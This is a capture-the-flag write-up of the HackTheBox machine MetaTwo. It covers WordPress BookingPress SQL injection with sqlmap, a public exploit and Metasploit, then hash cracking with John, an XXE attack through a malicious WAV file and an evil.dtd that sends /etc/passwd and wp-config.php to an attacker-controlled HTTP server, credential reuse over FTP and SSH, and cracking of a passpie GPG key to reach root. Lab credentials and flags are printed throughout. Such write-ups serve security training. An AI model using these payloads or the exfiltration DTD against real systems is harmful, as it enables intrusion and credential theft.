Information gathering

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST
Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining)
Nmap scan report for 10.129.231.241
Host is up (0.0093s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open  http    nginx 1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
```
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain to /etc/hosts:
```
vim /etc/hosts
$IP metapress.htb
```
The Wappalyzer browser extension reports the WordPress and PHP versions:
```
WordPress 5.6.2
PHP 8.0.24
```
SQL injection

Browsing to the site's event directory and inspecting the page source shows the BookingPress plugin at version 1.0.10, which is affected by CVE-2022-0739.
The page source also contains the _wpnonce field with the value 1d0870781e. With that nonce, the PoC from https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357/ can be used to test for the vulnerability.
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─
```
The response is:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 15 Sep 2024 05:25:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.0.24
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin

[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```
This response confirms the SQL injection: the injected query's results (the MariaDB version string and the OS name) are returned in the service fields.
Method 1: sqlmap
```
sqlmap -u "http://metapress.htb/wp-admin/admin-ajax.php" --method POST --data "action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=111" -p total_service --level=5 --risk=3 --dbs
```
Scan result:
```
[15:30:38] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.24, Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:30:38] [INFO] fetching database names
available databases [2]:
[*] blog
[*] information_schema

[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 15:30:38 /2024-09-15/
```
Continuing with the blog database:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.8#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:31:57 /2024-09-15/

[15:31:57] [INFO] resuming back-end DBMS 'mysql'
[15:31:57] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: total_service (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=-3077) OR 8095=8095-- ISEb

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=111) AND (SELECT 5120 FROM (SELECT(SLEEP(5)))WRSg)-- lhbW

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: action=bookingpress_front_get_category_services&_wpnonce=1d0870781e&category_id=123&total_service=111) UNION ALL SELECT NULL,CONCAT(0x717a767171,0x4253565341777451764c4358734e655958576c53574e484873657447514d6c4365647363534f6255,0x716a627671),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[15:31:57] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.18.0, PHP 8.0.24
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[15:31:57] [INFO] fetching tables for database: 'blog'
Database: blog
[27 tables]
+--------------------------------------+
| wp_bookingpress_appointment_bookings |
| wp_bookingpress_categories           |
| wp_bookingpress_customers            |
| wp_bookingpress_customers_meta       |
| wp_bookingpress_customize_settings   |
| wp_bookingpress_debug_payment_log    |
| wp_bookingpress_default_daysoff      |
| wp_bookingpress_default_workhours    |
| wp_bookingpress_entries              |
| wp_bookingpress_form_fields          |
| wp_bookingpress_notifications        |
| wp_bookingpress_payment_logs         |
| wp_bookingpress_services             |
| wp_bookingpress_servicesmeta         |
| wp_bookingpress_settings             |
| wp_commentmeta                       |
| wp_comments                          |
| wp_links                             |
| wp_options                           |
| wp_postmeta                          |
| wp_posts                             |
| wp_term_relationships                |
| wp_term_taxonomy                     |
| wp_termmeta                          |
| wp_terms                             |
| wp_usermeta                          |
| wp_users                             |
+--------------------------------------+

[15:31:57] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 15:31:57 /2024-09-15/
```
The wp_users table holds the user account data. Dump it:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB]
└─
Database: blog
Table: wp_users
[2 entries]
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url             | user_pass                          | user_email            | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb   | admin      | 0           | admin        | admin         | 2022-06-23 17:58:28 | <blank>             |
| 2  | <blank>              | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager    | 0           | manager      | manager       | 2022-06-23 18:07:55 | <blank>             |
+----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+

[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv'
[15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'

[*] ending @ 15:38:24 /2024-09-15/
```
This gives us the users' password hashes:
```
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
```
Method 2: use the public exploit https://github.com/destr4ct/CVE-2022-0739/blob/main/booking-press-expl.py
Running it returns the result almost immediately:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
- BookingPress PoC
-- Got db fingerprint: 10.5.15-MariaDB-0+deb11u1
-- Count of users : 2
|admin|admin@metapress.htb|$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.|
|manager|manager@metapress.htb|$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70|
```
Method 3: Metasploit does it in one go:
```
msf6 > search bookingpress

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank    Check  Description
   -  ----                                                      ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_bookingpress_category_services_sqli  2022-02-28       normal  Yes    Wordpress BookingPress bookingpress_front_get_category_services SQLi


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli

msf6 > use 0
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb
RHOST => metapress.htb
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/
TARGETURI => /events/
msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run
[*] Running module against 10.129.231.241
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Extracting credential information

Wordpress User Credentials
==========================

 Username  Email                  Hash
 --------  -----                  ----
 admin     admin@metapress.htb    $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
 manager   manager@metapress.htb  $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70

[*] Auxiliary module execution completed
```
Cracking the hashes

Save the hashes to a file:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
admin:$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
manager:$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
```
Use John the Ripper, which ships with Kali, to crack the hashes. Result:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (manager)
```
Username and password:

```
manager:partylikearockstar
```
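To see what John is actually checking in the phpass output above, and why "Cost 1 (iteration count) is 8192" is cheap to brute-force, here is the WordPress portable-hash ($P$) algorithm in Python. This is an added example, not code from the page or from WordPress; the only value taken from the page is the manager hash.

```python
import hashlib
import hmac

# phpass alphabet used by the WordPress "portable" ($P$ / $H$) hashes in wp_users.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# The manager hash from the wp_users dump on this page.
MANAGER_HASH = "$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70"


def _encode64(data: bytes, count: int) -> str:
    """phpass's own base64 variant (not RFC 4648): 16 digest bytes -> 22 chars."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def parse_phpass(stored: str):
    """Split a $P$/$H$ hash into (log2 rounds, rounds, 8-char salt).

    Character 3 is the work factor: its index in ITOA64, rounds = 2**index.
    WordPress writes 'B' (index 13), which is the 8192 John reports as Cost 1.
    """
    if len(stored) != 34 or stored[:3] not in ("$P$", "$H$"):
        raise ValueError("not a phpass portable hash")
    log2 = ITOA64.index(stored[3])
    if not 7 <= log2 <= 30:
        raise ValueError("invalid iteration count")
    return log2, 1 << log2, stored[4:12]


def phpass_hash(password: str, salt: str, log2: int = 13) -> str:
    """Recompute a portable hash: md5(salt+pw), then 2**log2 rounds of md5(h+pw).

    Every round is one raw MD5 with no memory cost, which is why John tears
    through these on a CPU even at 8192 iterations.
    """
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 chars from the phpass alphabet")
    pw = password.encode()
    h = hashlib.md5(salt.encode() + pw).digest()
    for _ in range(1 << log2):
        h = hashlib.md5(h + pw).digest()
    return "$P$" + ITOA64[log2] + salt + _encode64(h, 16)


def phpass_verify(password: str, stored: str) -> bool:
    """The check wp_check_password() performs for a portable hash.

    $H$ (phpBB) hashes differ from $P$ only in the prefix, so compare after it.
    """
    log2, _, salt = parse_phpass(stored)
    candidate = phpass_hash(password, salt, log2)
    return hmac.compare_digest(candidate[3:], stored[3:])


if __name__ == "__main__":
    print(parse_phpass(MANAGER_HASH))
    print(phpass_verify("partylikearockstar", MANAGER_HASH))
```

Any WordPress site on PHP 7.4 or newer can replace this scheme with bcrypt via a pluggable wp_hash_password(), which is the mitigation for the crack rate shown above.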
Using the XXE vulnerability to get user_flag

Log in with this password at the default admin path /wp-admin.
According to information found online, this version of WordPress is affected by the XXE vulnerability CVE-2021-29447:
https://wpscan.com/wordpress/562/
https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5/
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
https://tryhackme.com/r/room/wordpresscve202129447
We need two files, payload.wav and evil.dtd.
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
```
Note: Make sure to input the IP of your tun0 interface in the above payload.
Create the file evil.dtd:

```xml
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.8:8080/?p=%file;'>" >
```
Start an HTTP server with Python:

```
python3 -m http.server 8080
```
Open the site and upload the .wav file just created to the WordPress Media Library.

After the upload, the web server receives the following requests, carrying the file contents as base64-encoded data:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /evil.dtd HTTP/1.1" 200 -
10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /?p=... HTTP/1.1" 200 -
10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /evil.dtd HTTP/1.1" 200 -
10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /?p=... HTTP/1.1" 200 -
```
Base64-decoding the data gives:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false
proftpd:x:106:65534::/run/proftpd:/usr/sbin/nologin
ftp:x:107:65534::/srv/ftp:/usr/sbin/nologin
```
From this we can tell that a regular user named jnelson exists (UID 1000 with a /bin/bash shell).
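The decode-and-triage step above, done by hand in the writeup, as a script: it pulls the ?p= callbacks out of an http.server log in the format shown, decodes each distinct blob once (WordPress parses the upload twice, hence the duplicate GETs), and lists the accounts that have a real login shell. This is an added example, not from the page; the log lines and passwd excerpt are constructed for it, and the same parsing is what an incident responder applies to a captured callback log when reconstructing what an XXE read.

```python
import base64
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample: a short /etc/passwd excerpt, base64-encoded into the p=
# parameter of http.server log lines in the format the page shows. Not real data.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
    "jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash\n"
    "mysql:x:105:111:MySQL Server,,,:/nonexistent:/bin/false\n"
)
# '=' padding stripped on purpose: it is often lost or percent-encoded in a URL.
_B64 = base64.b64encode(SAMPLE_PASSWD.encode()).decode().rstrip("=")
SAMPLE_LOG = "\n".join([
    '10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /evil.dtd HTTP/1.1" 200 -',
    f'10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /?p={_B64} HTTP/1.1" 200 -',
    '10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /evil.dtd HTTP/1.1" 200 -',
    f'10.129.231.241 - - [15/Sep/2024 16:37:30] "GET /?p={_B64} HTTP/1.1" 200 -',
])

_CALLBACK = re.compile(r'"GET /\?p=([A-Za-z0-9+/=%]+) HTTP/1\.[01]"')

# Shells that mean "this account cannot log in interactively".
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def extract_payloads(log_text: str) -> List[str]:
    """Decode each distinct base64 blob carried in a ?p= callback.

    Percent-encoding is undone, missing '=' padding restored, and identical
    blobs (the upload is parsed twice, so every GET appears twice) collapsed.
    """
    decoded: List[str] = []
    for m in _CALLBACK.finditer(log_text):
        blob = unquote(m.group(1))
        blob += "=" * (-len(blob) % 4)
        text = base64.b64decode(blob).decode("utf-8", errors="replace")
        if text not in decoded:
            decoded.append(text)
    return decoded


def login_accounts(passwd_text: str) -> List[Tuple[str, int, str]]:
    """Return (user, uid, shell) for every passwd entry with a usable login shell."""
    found: List[Tuple[str, int, str]] = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue  # blank or damaged line; /etc/passwd has exactly 7 fields
        user, _, uid, _, _, _, shell = fields
        if shell not in NON_LOGIN_SHELLS:
            found.append((user, int(uid), shell))
    return found


if __name__ == "__main__":
    for text in extract_payloads(SAMPLE_LOG):
        print(login_accounts(text))
```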
Modify evil.dtd so that it reads the wp-config.php configuration file instead:

```xml
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.14.8:8080/?p=%file;'>" >
```
Repeat the upload and decode the returned data; it yields the following:
```php
<?php
define( 'DB_NAME', 'blog' );
define( 'DB_USER', 'blog' );
define( 'DB_PASSWORD', '635Aq@TdqrCwXFUZ' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );

define( 'FS_METHOD', 'ftpext' );
define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );
define( 'FTP_BASE', 'blog/' );
define( 'FTP_SSL', false );

define( 'AUTH_KEY',         '?!Z$uGO*A6xOE5x,pweP4i*z;m`|.Z:X@)QRQFXkCRyl7}`rXVG=3 n>+3m?.B/:' );
define( 'SECURE_AUTH_KEY',  'x$i$)b0]b1cup;47`YVua/JHq%*8UA6g]0bwoEW:91EZ9h]rWlVq%IQ66pf{=]a%' );
define( 'LOGGED_IN_KEY',    'J+mxCaP4z<g.6P^t`ziv>dd}EEi%48%JnRq^2MjFiitn#&n+HXv]||E+F~C{qKXy' );
define( 'NONCE_KEY',        'SmeDr$$O0ji;^9]*`~GNe!pX@DvWb4m9Ed=Dd(.r-q{^z(F?)7mxNUg986tQO7O5' );
define( 'AUTH_SALT',        '[;TBgc/,M#)d5f[H*tg50ifT?Zv.5Wx=`l@v$-vH*<~:0]s}d<&M;.,x0z~R>3!D' );
define( 'SECURE_AUTH_SALT', '>`VAs6!G955dJs?$O4zm`.Q;amjW^uJrk_1-dI(SjROdW[S&~omiH^jVC?2-I?I.' );
define( 'LOGGED_IN_SALT',   '4[fS^3!=%?HIopMpkgYboy8-jl^i]Mw}Y d~N=&^JsI`M)FJTJEVI) N#NOidIf=' );
define( 'NONCE_SALT',       '.sU&CQ@IRlh O;5aslY+Fq8QWheSNxd6Ve#}w!Bq,h}V9jKSkTGsv%Y451F8L=bL' );

$table_prefix = 'wp_';

define( 'WP_DEBUG', false );

if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}

require_once ABSPATH . 'wp-settings.php';
```
This gives us the username and password for the FTP server:

```
username: metapress.htb
password: 9NYS_ii@FyL_p5M2NvJ
```
Connect to the FTP server:

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
Connected to 10.129.231.241.
220 ProFTPD Server (Debian) [::ffff:10.129.231.241]
331 Password required for metapress.htb
Password:
230 User metapress.htb logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```
On the FTP server we find the mailer source code and a script, send_email.php, that sends e-mail to all users; it contains the credentials of the jnelson user.
```
ftp> ls
229 Entering Extended Passive Mode (|||15602|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   5 metapress.htb metapress.htb     4096 Oct  5  2022 blog
drwxr-xr-x   3 metapress.htb metapress.htb     4096 Oct  5  2022 mailer
226 Transfer complete
ftp> cd mailer
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||2643|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   4 metapress.htb metapress.htb     4096 Oct  5  2022 PHPMailer
-rw-r--r--   1 metapress.htb metapress.htb     1126 Jun 22  2022 send_email.php
226 Transfer complete
ftp> get send_email.php
local: send_email.php remote: send_email.php
229 Entering Extended Passive Mode (|||61637|)
150 Opening BINARY mode data connection for send_email.php (1126 bytes)
100% |**************************************************************|  1126       15.12 MiB/s    00:00 ETA
226 Transfer complete
1126 bytes received in 00:00 (145.75 KiB/s)
```
Download the file with the ftp get command and view it locally:
```php
<?php
use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\SMTP;
use PHPMailer\PHPMailer\Exception;

require 'PHPMailer/src/Exception.php';
require 'PHPMailer/src/PHPMailer.php';
require 'PHPMailer/src/SMTP.php';

$mail = new PHPMailer(true);

$mail->SMTPDebug = 3;
$mail->isSMTP();

$mail->Host = "mail.metapress.htb";
$mail->SMTPAuth = true;
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
$mail->SMTPSecure = "tls";
$mail->Port = 587;

$mail->From = "jnelson@metapress.htb";
$mail->FromName = "James Nelson";

$mail->addAddress("info@metapress.htb");

$mail->isHTML(true);

$mail->Subject = "Startup";
$mail->Body = "<i>We just started our new blog metapress.htb!</i>";

try {
    $mail->send();
    echo "Message has been sent successfully";
} catch (Exception $e) {
    echo "Mailer Error: " . $mail->ErrorInfo;
}
```
Combined with the /etc/passwd obtained earlier, which showed that the user jnelson exists, this script gives us that user's password:

```
$mail->Username = "jnelson@metapress.htb";
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";
```
Log in via SSH:

This gives user_flag:

```
0a432515f485c621b015cefe55d1e72e
```
Privilege escalation to get root_flag

The home directory contains a hidden folder, .passpie:
```
jnelson@meta2:~$ ls -la
total 32
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25  2022 .
drwxr-xr-x 3 root    root    4096 Oct  5  2022 ..
lrwxrwxrwx 1 root    root       9 Jun 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 jnelson jnelson  220 Jun 26  2022 .bash_logout
-rw-r--r-- 1 jnelson jnelson 3526 Jun 26  2022 .bashrc
drwxr-xr-x 3 jnelson jnelson 4096 Oct 25  2022 .local
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25  2022 .passpie
-rw-r--r-- 1 jnelson jnelson  807 Jun 26  2022 .profile
-rw-r----- 1 root    jnelson   33 Sep 15 05:47 user.txt
```
A quick search shows that passpie is a password manager written in Python. According to its official documentation, the stored passwords can be exported with:

```
passpie export password.db
```
The .keys file holds the GPG key pair passpie encrypts the database with; its private key is protected by the passpie passphrase.
```
jnelson@meta2://home/jnelson/.passpie$ ls -la
total 24
dr-xr-x--- 3 jnelson jnelson 4096 Oct 25  2022 .
drwxr-xr-x 4 jnelson jnelson 4096 Oct 25  2022 ..
-r-xr-x--- 1 jnelson jnelson    3 Jun 26  2022 .config
-r-xr-x--- 1 jnelson jnelson 5243 Jun 26  2022 .keys
dr-xr-x--- 2 jnelson jnelson 4096 Oct 25  2022 ssh
```
```
jnelson@meta2://home/jnelson/.passpie$ cat .keys
-----BEGIN PGP PUBLIC KEY BLOCK-----
[public key block omitted]
-----END PGP PUBLIC KEY BLOCK-----
-----BEGIN PGP PRIVATE KEY BLOCK-----
[private key block omitted]
-----END PGP PRIVATE KEY BLOCK-----
```
Save the private key to a file named key and convert it to John's hash format:

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
File key
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
Passpie:$gpg$*17*54*3072*e975911867862609115f302a3d0196aec0c2ebf79a84c0303056df921c965e589f82d7dd71099ed9749408d5ad17a4421006d89b49c0*3*254*2*7*16*21d36a3443b38bad35df0f0e2c77f6b9*65011712*907cb55ccb37aaad:::Passpie (Auto-generated by Passpie) <passpie@local>::key
```
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash. Running john then reported an error:
```
Crash recovery file is locked: /root/.john/john.rec
```
Fix:

Start cracking:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65011712 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blink182         (Passpie)
1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
The cracked passphrase is blink182.

Using it, export the passpie password database:
```
jnelson@meta2:~$ passpie export passwd
Passphrase:
jnelson@meta2:~$ ls
passwd  user.txt
jnelson@meta2:~$ cat passwd
credentials:
- comment: ''
  fullname: root@ssh
  login: root
  modified: 2022-06-26 08:58:15.621572
  name: ssh
  password: !!python/unicode 'p7qfAZt4_A1xo_0x'
- comment: ''
  fullname: jnelson@ssh
  login: jnelson
  modified: 2022-06-26 08:58:15.514422
  name: ssh
  password: !!python/unicode 'Cb4_JmWM8zUZWMu@Ys'
handler: passpie
version: 1.0
```
Log in with the root password p7qfAZt4_A1xo_0x to get root_flag:

```
jnelson@meta2:~$ su root
Password:
root@meta2:/home/jnelson#
e0a4f8aac97646de58a612e9825392dd
```
Notes

For a hash file that has already been cracked, the second time around just use the --show option; there is no need to crack it again.

```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo]
└─# john --show user.hash
manager:partylikearockstar
```
References
https://github.com/evyatar9/Writeups/tree/master/HackTheBox/MetaTwo
https://medium.com/@KonradDaWo/hackthebox-metatwo-writeup-59135896c890
https://7rocky.github.io/en/htb/metatwo/
https://enterprise.hackthebox.com/machine/605/19206/writeup